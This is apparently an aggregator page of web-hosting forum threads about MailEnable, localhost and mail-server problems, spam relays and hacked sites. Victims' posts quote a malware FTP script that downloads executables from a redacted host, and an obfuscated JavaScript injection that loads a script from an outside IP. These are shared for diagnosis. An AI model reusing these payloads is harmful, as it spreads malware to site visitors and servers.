SuperbHosting.net & Arvixe.com have generously
sponsored
dedicated servers and web hosting to ensure
a reliable and scalable dedicated hosting
solution for BigResource.com.
Malicious Mail Sent Out Via MailEnable On Localhost
we received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from 127.0.0.1 to the smtp service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.
Mail Server & Webmail In Localhost
I want to run a local Mail Server + Webmail Client (opensource. I googled and I found hmailserver[server] and Roundcube [webmail]. the problem that i can't config any of them How have an other alternative for mail server or a solution
Localhost Server With Mail Server
I would like to set up a localhost server with a mail server too, I usually use uniform server as I find it very easy to get up and running and carry around with me, are there any better solutions, I have found it difficult to get a mail server running on the uniform server. or maybe there are distributions that come with mail server ready built in?
Helm - MailEnable
when i click "Email Accounts" section in Helm see "Failed to get Email Accounts",also cant add any new Email Account, Helm Log:
Cannot create ActiveX component. at Microsoft.VisualBasic.Interaction.CreateObject(String ProgId, String ServerName) at MailEnable.Administration.Mailbox.GetAutoResponderStatus() at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccount(String name) at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccountList() at MailEnableProvider.ListEmailAccounts(ProviderData CommandData) ......
MailEnable Security
I didn't see this posted anywhere here so I just thought I'd give everyone who uses MailEnable a heads up. If you are not using the most up to date version of MailEnable, run to [url] and download it.
I have seen couple of dozen boxes getting infected because they had a MailEnable Standard 1.95 for instance (or Professional 2.11), or anything else that's not up to date. Virus(es) are severe and will cause you a lot of problems... if your server still hasn't been infected and you're not using the latest MailEnable, go upgrade right away!
If you are a hosting company and are using Plesk 7.6.1 you definitely have your helpdesk swapped by now. Biggest problem is that Plesk 7.6.1 comes with MailEnable Std 1.95 where the latest version is 1.981. I have seen servers that were clean OS installs, Plesk 7.6.1 installed and 5 minutes after the box was compromised.
If you are still able to access the box by RDP (or have access to it locally), make sure to disable MailEnable SMTP Relay Service. This is not a part of MailEnable and if you don't disable it you won't be able to remove rdriv.sys from your system32 directory which does quite something to your server. Also check for following:
Make sure you don't have script1.txt in system32, and if you have it make sure to remove it. It contains:
open XXX.XXX.XXX.XXX (IP edited away by Boon Chuan to prevent abuse) user anonymous anonymous@on.the.net lcd c:windowssystem32 get explorer.exe get runservice_bis.dll get kill.exe get fport.exe get hyberport.exe get JASFV.INI bye
Nothing has been heard from SWsoft about this issue yet...
MailEnable To HMail
I have MailEnable free on a windows server with Plesk 8.1.
I need IMAP so I thought at hMail. The problem:
I need to copy all the mail content to hMail as I understand Plesk will copy all the accounts except the mail content.
I have found that I can use some vbs from PMM but that requires me to know all the accounts passwords and to do manually every backup/restore for all the e-mails.
Is there an other way to switch to hMail without loosing the mail content ? (IMAPCopy is not an option as it need IMAP and that is not present in MailEnable free, and also needs all all the passwords for all the accounts).
An other problem, I do not have an other windows server so I cannot use Plesk Migration Manager to migrate accounts and then migrate back.
Malicious Javascript
We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.
An example of the code that has been inserted can be found below: <!-- document.write(unescape('xXz%3CAEqscripzHVt%20RMisAEqrRMicxXz%3DzHV%2FyI%2F6 yI7zHV%2E21wq5RMi%2E2xXz4wq6%2E3AEq4RMi%2FjqAEquwqexXzry%2EjsyI%3E%3CzHV%2Fs crRMiiwqpzHVtwq%3E').replace(/yI|zHV|fW|xXz|RMi|wq|AEq/g,"")); --> Which runs this script: <script src=//67.215.246.34/jquery.js></script>
New pages have been created on a number of websites aswell as the above code inserted into existing pages.
After removing the above code from one particular website it has happened again. Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.
Mailenable : Copy All Inbound / Outbound Email
I'm using the free edition of MailEnable and need to configure each post office to copy all incoming and outgoing email to one of the email accounts on the same post office.
Is there a way to configure this ?
I know I can configure mail forwarding on incoming mail per account but need to do it for all acounts (except the audit account).
e.g. anythinghere@dbnetsolutions.co.uk incoming or outgoing would be copied to audit@dbnetsolutions.co.uk
Mulcishell Malicious Script
Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)
Cgi With Malicious Code
I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?
CentOS 5.2 - 64bits
WHM+cPanel
Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
I have been told there is a way to do this but i havent been told how..
Basicaly i want to know if there is something where i can add a list of keywords that are in the malicious files and what ever it is will stop them from being uploaded or if they manage to get uploaded onto my vps will it make them not work?
I am looking into this as i had an issue before where someone uploaded a shell onto my server :@ luckily it didnt cause no damage or he didnt get anywhere but i still want to be safe.
Malicious Code Added To Index File
I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.
I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.
- I cannot prohibit using exec functions (some binary uses are needed, like host, mysqldump, etc..)
- I cannot restrict at all via UID/GID method at bins due to several problems..
Safe mode is the final sollution, as I only need "safe_mode_exec_dir" config to set a folder with the necesary binaries... this will stop nobody user (Apache) to exec whatever it wants, like perl, binaries uploaded to an public insecure folder (exploits), or anything else... people only could exec() the binaries I want and where I want. This will stop finally 95% of my hack problems.
Well. The problem is safe_mode is enabled or not, but you cannot set o disable certain features of this safe mode, like UID/GID checks (*******!)...
I am trying to configure so only "safe_mode_exec_dir" would apply, so:
- Including UIDs checks disabled by: safe_mode_include_dir = "/home/" (tested)
- Some variables set to NULL, as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...
- safe_mode_exec_dir = "/usr/phpbin/" Great! with symbolic lynks in... the best sollution available for me.
- open_basedir = "/home/" (for fopen, etc...)
Ok ok.. but problems there.. by example this one:
Quote:
Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823
Great.. fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir would not apply...
Now fopen, link, unlink, etc.. functions are UID restricted and this seems to be impossible to disable.... pffffffff...
can you share your safe_mode configs or sollutions for this problem?
Google Shows Tha My Site Has Malicious Code And Blocked Me
for the first time in my sites life(10 year site) google blocked it. when you type my site google says that my site has malicious code in it.as we find it the problem in my site came from the company where i hosted it.we clear all the files for the malicious code and now its all ok.i want to ask if anyone knows for his experience how much days google will check my site again to see if all its ok.i send them before six hours via webmaster tools, a request for eaming agin my site,but i dont knwo how will do these. so i am asking anyone of you,who had same experience.any help will be appreciate.please help me with anything you think that might be useful for me to having my site back again in google correctly!
Hacker Adds Malicious Code To All Html And Php Files
we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?
The problem:
On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.
Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.
On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.
We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.
What we have done to attempt to secure the server: 1) We have installed SuPhp.
2) We have ensured that all scripts on the affected websites are updated and running the latest versions.
3) We have changed all the passwords.
Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.
The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.
One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.
Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?
Vietnamese Localhost
I am a Vietnamese girl and a new member. I'd just like to ask anybody knows about vietnamese localhost? I use appserv, but it does not have vietnamese language, so if I'd like to submit categories, etc. in Vietnamese into my phpmyadmin, it does not work.
Only languages are okay, like: English, Deutsch, French, Spain, .... but there are no Vietnamese language. What should I do?
We write with latin characters, but there are apostrophes which appserv cannot read.
Does it happen to any Vietnamese here in forum?
how can write a text in Vietnamese language into phpmyadmin,
DSL + Localhost
A friend of me would like to setup a local server with my DSL. The problem is the IP address keeps changing and he does not want to purchase a static IP.
The script needs to detect the IP address and then email it to the admin over here daily.
How To Catch Localhost Spammers
I am failed to catch this spammer, please help me to find out the source. There is no such domain on my server. User is using localhost in smtp, I am using mail enable standard on my server ....
127.0.0.1 Works But Not Localhost
I just installed wamp here on my laptop to set up a developer machine for my website. I am used to going into the browser and just typing in "localhost" and having it bring up the test website. I'm sure there is probably something wrong with the configuration of the wamp files because it works for 127.0.0.1.
Haven't used it for a while but now for some reason I can't access http://localhost, firefox tells me, "Firefox can't establish a connection to the server at localhost.".
I can access WampServer via [url]and the main WampServer default page appears.
Apache version : 2.2.8
PHP : 5.2.6
MySql : 5.0.51b
Which file(s) do I need to edit in order to associate localhost to 127.0.0.1
I have just installed PHP on the 'default web site' and I want to use it to run some admin jobs. BUT I do not want the PHP scripts to be accessible over the internet, they should only run from local machine.
Is it possible to set it up so that the files can be executed only by localhost?
Accessing Blog On Localhost
I installed Wordpress on a local install of Apache so that I can play around with it and get my design down before I put it on the web. I can get to the admin and do everything, but I can't actually get to the site. I had an index.html in my htdocs directory, which was deleted, but now when I go to localhost, it just shows the directory.
Loading Localhost With Apache
I've had a localhost server setup for awhile now, and all of a sudden when I access [url]it wants to download my "index.php" file. However, when I access it via [url]is loads fine.
Configuring Subdomains In Apache On A Localhost
I'm currently trying to configure apache 2 to handle subdomains. This is on a local machine (not tied to any domain names) and I'm only doing it to research how the final structure of a site 'could' be setup.
Basically I have a single install of Apache 2 running. The outcome eventually should be to have specific sub domains that all point to the same document root as the actual domain name. So eventually I will have:
Now on my local machine, only the top one works - the subdomains dont. if I add the following into my hosts file in windows, they all work: 127.0.0.1 daneastley 127.0.0.1 subdomain1.daneastley 127.0.0.1 subdomain2.daneastley
the problem being, that I wish to test this enviroment on the local network. How would I go about having every computer being able to access this? I'm assuming it comes down to DNS stuff.
Iphone Lighttpd-no Localhost When Offline
Does anyone know where the seek order information is located on an apple iphone. I installed lighttpd on the mobile, however I can only see localhost when I'm online.
Unable To Connect Localhost(10061)
I am stuck in re-installing mysql server..... Everything I have removed even mysql service give reboot the machine but still not able to complete the installation.
At the end I receive error " Can't connect to Mysql server with LocalHost (10061)
By the way if port 3306 is not enabled in firewall can this issue be occurred because of this?
Fast MySql Access- Localhost
I've been using Dreamhost for years and they're very good, but their MySql databases are quite slow. Then I moved to ServInt with a VPS, and my MySql is on localhost instead of on a different server. WOW! It's so fast!
However, now I'm trying to find a shared hosting package that has fast MySQL service.
I'm not sure if the requirement is that it's on localhost but it sure doesn't hurt.
Is there anyone who is familiar of a good solid shared hosting package with fast MySQL service?
Local Mysql Server Name, IP Or Localhost
I am using localhost as mysql server name on my config file. then, when I enter [url], the address will automatically change to[url]that obviously getting error. when I change the mysql server name from localhost to the server public IP, everything seems ok.
My sql is 4.1.x with php 4.4.7, is that any way I may use localhost instead of IP?
Bluescreen On Win XP Accessing Localhost
I just installed IIS on my Windows XP machine and any time I access localhost I get a bluescreen and my computer will restart. I have tried to uninstall IIS, reboot, re-install, reboot then try accessing localhost and that does not fix anything. This is on an almost fresh install of Windows. (The computer is only 1 week old)
I use Squirrelmail to se my e-mail. When i try to log inn and read mail i get this message: Error connecting to IMAP server: localhost. Where can i change this......
Squirrelmail
SquirrelMail version 1.4.17 By the SquirrelMail Project Team ERROR Error connecting to IMAP server: localhost. 111 : Connection refused
webmail
ERROR (2): fsockopen() [function.fsockopen]: unable to connect to localhost:110 (Connection refused) (/var/www/html/webmail/inc/class.uebimiau_mail.php:80)
RoundCube Webmail
Connection to Imap server failed
Read on another forum, that this can solve the problem
My server works perfectly with INSERT, UPDATE, DELETE for mysql. but after like 12 hours later, my application crashes and I get this "Can't connect to MySQL server on 'localhost' (10055)" and I would have to restart my applications and everything will be working perfectly.
Do you guys have any idea why this happen?
I do have a lot of connections coming in and out of my server. Would that mean anything?
I have the users daemon, freesexd and root in the trusted_users file. I have restarted sendmail (using service sendmail restart). I have the domains: server.freesexdoor.com, freesexdoor.com and mail.freesexdoor.com in the sendmail's local_hosts file.
In Apache 2's httpd.conf, I have this: php_admin_value sendmail_path '/usr/sbin/sendmail -t -i -f freesexd [at} freesexdoor.com'
Yet when I sent an e-mail with php to advertising [at} freesexdoor.com, I got these headers in the e-mail, which don't look good to a spam filter:
Received: from localhost.localdomain (IS-3293 [127.0.0.1]) by localhost.localdomain (8.13.8/8.13.8) with ESMTP id
Received: (from daemon@localhost) by localhost.localdomain (8.13.8/8.13.8/Submit) id
Additionally hotmail rejects my e-mails and it is obvious why. (My OpenSPF record is fine btw and on my former server I was able to send e-mails with it fine.)
Naturally I want something like "freesexdoor.com" to replace "localhost.localdomain" in those header lines. So how can I get this working?
Everything works fine, I chose VPC Shared Networking (NAT) and I can access the internet from the VPC as well as my Apache development server which runs on the host OS (Win XP) by going to the host's IP address which is [url] in my case. And here I have 2 problems:
1. I want to access [url]on VPC just by typing [url]. I added the following line to the hosts file:
192.168.52.141 localhost
But this doesn't work. Interestingly, any name other than localhost works fine, for example:
192.168.52.141 localhost.localhost or 192.168.52.141 local
This is not a major problem but I'd prefer localhost. Any ideas how to do that?
2. And the more important issue: on my host OS I have some development sites which I have set up to be accessed by subdomains, for example [url], in httpd.conf:
Code: <VirtualHost 127.0.0.3> ServerName perfekt.localhost DocumentRoot C:wwwperfekt DirectoryIndex index.php index.html </VirtualHost> and in hosts file:
Code: 127.0.0.3 perfekt perfekt.localhost And now I want to access this site from my VPC too by using subdomains like this! How can I do that? The address 127.0.0.3 seems to be local to the OS and VPC can't see it. I have tried setting other IP addesses in httpd.conf but nothing outside the 127.x.x.x range works on either OS. I suppose I need to make each of my sites to be seen under a different IP from the outside network so that VPC (which is "outside" the host OS) can access them - then I just set up the appropriate subdomain names in VPC hosts file -
But when im running lil test script which connect to my localhost with the same passwords and it gives the status 'Connection OK' (im running on admin account, made a MySQL account with DA)
Code:
<?php $link = mysql_connect('localhost','admin_removed','removed'); if (!$link) { die('Could not connect to MySQL: ' . mysql_error()); } echo 'Connection OK'; mysql_close($link); ?>
Basically I've set up this DHCP thingy to start at 192.etc.3 and the Wireless router is at 192.etc.1 and the Prestige is at 192.etc.2 my pc is at 192.etc.9
This is about where my knowledge stops unfortunately.
I have installed apache as the most basic default install I think you can and it seems to be working absolutely fine. I'm assuming I could also install PHP and MySQL etc and wouldn't have too much of a problem, however, my friend cannot seem to access the environment from the WAN IP and when I type in my WAN IP I get the prestige router's control panel.
I read somewhere that I needed to forward port 80, now I can 'open' ports in the prestige control panel but I did try opening port 80 in the control panel and pointing it to my LAN IP (92.etc.9) but it didn't seem to work.
I'm at a bit of a loss so if anyone could point me in the right direction I would be most grateful, just to clarify:
//localhost loads the html file 100% //192.etc.9 loads the html file 100% //62.WANIP internally loads my prestige routers control panel //62.WANIP externally does not load a page (cannot be found)
If you need any more info just let me know and I'll get it.
Some spammers have been targeting this particular to send spam through this server. This putting lot of load on the server because declude is processing the SPOOL in Smarter Mail and spool goes upto 2000-20000 during the day. We have been checking the headers and blocking the IP's continuously of these spam but these people are using dynamic ip's. And it doesn't seem like single spammer. Content is quite different.
Blocking full ranges of certain IP Range helps though but then lot of legitimate mail is getting blocked as well.
Is there any good suggestion or a serious mail server admin who can have a look and actually sort it.
This is causing serious delays on our mail delivery through this mail server.
Mail Proxy: How To Stop CGI Mail Proxies
During last week, two of our clients' accounts got compromised (most probably due to weak passwords) and there was a CGI script installed which started sending emails to more than 200,000 email accounts. This email addresses were stored in a text file.
By the time we noticed this activity, our server got black listed on major RBLs like Barracuda, SpamCop, Spamhaus etc and it took around 2 days to cleanup
3 days later, another account compromised with same *thing* and it really is pain in the arse now dealing with this and angry clients
We've already implemented a policy to restrict users to send 100 messages/per hour/domain which is working, but it seems this *thing* bypass exim.
I guess this Open Proxy Servers a Source of Spam is what i want to explain!
So my question is, if I've understood this right, is it possible to stop scripts like this or can we enforce mailman to use exim all the time to send messages and stop direct-mailing?
Php Mail Unable To Connect To Mail.userdomain.com:25
Warning: fsockopen() [function.fsockopen]: unable to connect to mail.userdomain.com:25 (Connection timed out) in /home/user/public_html/_inc/class.smtp5.php on line 122 Message could not be sent. Mailer Error: Language string failed to load: connect_host
Code: Gid 32157 is not permitted to relay mail, or has directly called /usr/sbin/exim instead of /usr/sbin/sendmail.
3. Fowarders working only on internal accounts e-mail fowarder@mydomain.com --> email@mydomain.com - working fowarder@mydomain.com --> my-emiail123@mail.pl - not working
This is VPS cPanel (OpenVZ) on my dedicated server.
Separate Mail Server- Deliver Mail To Hotmail
i'm thinking about building a separate mail server away from my cpanel/whm machine. that mail server will be located on a different IP address with "clean" record so that business email won't get deleted my strict rules of hotmail.
can you please tell me, generally, about this "buidling separate mail server", i.e. what MTA, software, web-mail software, will it be worth? ,etc. Pointing me in the right direction will allow me to complete the project in the shortest time.
Cpanel Can't Send Mail To External Mail
I have migrated my cpanel server from one to other server. After finishing migration. All email account can't send mail to external mail such as to "yahoo mail".
Here, some log: ------------------------------------------- Return-path: <test@mydomain.com> Received: from localhost ([127.0.0.1] helo=mydomain.com) by server.hostname.com with esmtpa (Exim 4.69) (envelope-from <test@myadomain.com>) id 1N1wop-0004bE-ST for someone@yahoo.co.uk; Sun, 25 Oct 2009 09:43:11 +0300 Received: from XXX.161.156.165 ([125.161.156.165]) (SquirrelMail authenticated user test@myadomain.com) by mydomain.com with HTTP; Sun, 25 Oct 2009 09:43:11 +0300 (MSK) Message-ID: <14566.XXX.161.156.165.1256452991.squirrel@domain> Date: Sun, 25 Oct 2009 09:43:11 +0300 (MSK) Subject: Test mail From: test@myadomain.com To: someone@yahoo.co.uk User-Agent: SquirrelMail/1.4.13 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal
Message not sent. Server replied: Requested action aborted: error in processing 451 Temporary local problem - please try later
We have tried all the mail processing apps on Webmail (horde/squirrel/roundcube) and all of them seem to do the same thing. We have restart exim and that doesn't do anything either.
I tried searching Google, but I didn't find too much luck there.
Does any one know how to change the VZ SSL to localhost.localdomain as shown in the attachment? I asked many providers and non of them like to change this. I got one provider willing to change this for me but he's not very sure how.
Someone told me that "Ask your provider to study how VZPP is handled by apache in the service container and they should find his way through"
I'm already aware that this should be done from the main hardware node not from the clients VPS itself.
TRACKER
